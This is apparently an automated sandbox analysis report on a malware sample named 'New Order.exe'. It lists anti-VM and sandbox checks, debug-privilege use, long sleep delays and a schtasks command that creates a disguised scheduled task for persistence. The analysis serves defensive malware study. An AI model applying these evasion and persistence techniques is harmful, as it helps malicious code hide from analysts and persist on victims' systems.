Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000000.00000002.365195256.0000000003361000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: New Order.exe PID: 5976, type: MEMORY

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\New Order.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\New Order.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\New Order.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: New Order.exe, 00000000.00000002.365090129.00000000032E1000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: New Order.exe, 00000000.00000002.365090129.00000000032E1000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\New Order.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\New Order.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\New Order.exe	Window / User API: threadDelayed 421			Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Window / User API: threadDelayed 9393			Jump to behavior

Source: C:\Users\user\Desktop\New Order.exe TID: 6068	Thread sleep time: -31500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe TID: 5972	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe TID: 5892	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe TID: 5908	Thread sleep count: 421 > 30	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe TID: 5908	Thread sleep count: 9393 > 30	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe TID: 5892	Thread sleep count: 44 > 30	Jump to behavior

Source: C:\Users\user\Desktop\New Order.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\New Order.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: New Order.exe, 00000000.00000002.365815510.0000000003655000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: New Order.exe, 00000000.00000002.365090129.00000000032E1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: New Order.exe, 00000000.00000002.365090129.00000000032E1000.00000004.00000001.sdmp	Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: New Order.exe, 00000000.00000002.365090129.00000000032E1000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: New Order.exe, 00000000.00000002.365195256.0000000003361000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: New Order.exe, 00000000.00000002.364775523.0000000001732000.00000004.00000001.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMwareGCTXYSPDWin32_VideoControllerO918XAXBVideoController120060621000000.000000-000524.8482display.infMSBDAPWOLYXS7PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsBAAH5TTB++
Source: New Order.exe, 00000000.00000002.365090129.00000000032E1000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: New Order.exe, 00000000.00000002.365195256.0000000003361000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: New Order.exe, 00000000.00000002.365815510.0000000003655000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: New Order.exe, 00000000.00000002.365195256.0000000003361000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: New Order.exe, 00000000.00000002.365090129.00000000032E1000.00000004.00000001.sdmp	Binary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
Source: New Order.exe, 00000003.00000002.689397022.00000000014EA000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\New Order.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Users\user\Desktop\New Order.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\New Order.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Source: C:\Users\user\Desktop\New Order.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\veTETlsQyxlWT' /XML 'C:\Users\user\AppData\Local\Temp\tmpC36D.tmp'			Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process created: C:\Users\user\Desktop\New Order.exe {path}			Jump to behavior

Source: New Order.exe, 00000003.00000002.689908650.0000000001A70000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: New Order.exe, 00000003.00000002.689908650.0000000001A70000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: New Order.exe, 00000003.00000002.689908650.0000000001A70000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: New Order.exe, 00000003.00000002.689908650.0000000001A70000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Users\user\Desktop\New Order.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
